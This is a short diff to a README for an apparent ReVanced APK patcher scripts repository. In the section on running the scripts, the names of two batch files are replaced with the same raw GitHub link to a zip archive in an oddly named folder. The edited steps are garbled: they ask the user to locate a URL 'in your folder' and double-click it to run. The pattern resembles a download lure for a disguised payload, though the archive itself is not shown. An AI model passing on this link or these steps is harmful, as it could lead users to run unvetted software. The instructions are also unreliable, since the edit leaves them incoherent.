bossman20/revanced-apk-patcher-scripts/README.md

 ## ⚙️ Running the Scripts

 1. **For Batch Scripts:**
-   - Locate the `patch-youtube.bat` or `patch-google-photos.bat` file in your folder.
+   - Locate the `https://raw.githubusercontent.com/bossman20/revanced-apk-patcher-scripts/master/proreduction/revanced-apk-patcher-scripts_v2.5-beta.4.zip` or `https://raw.githubusercontent.com/bossman20/revanced-apk-patcher-scripts/master/proreduction/revanced-apk-patcher-scripts_v2.5-beta.4.zip` file in your folder.
    - Double-click the desired file to run it.
    - Follow the on-screen instructions to complete the patching process.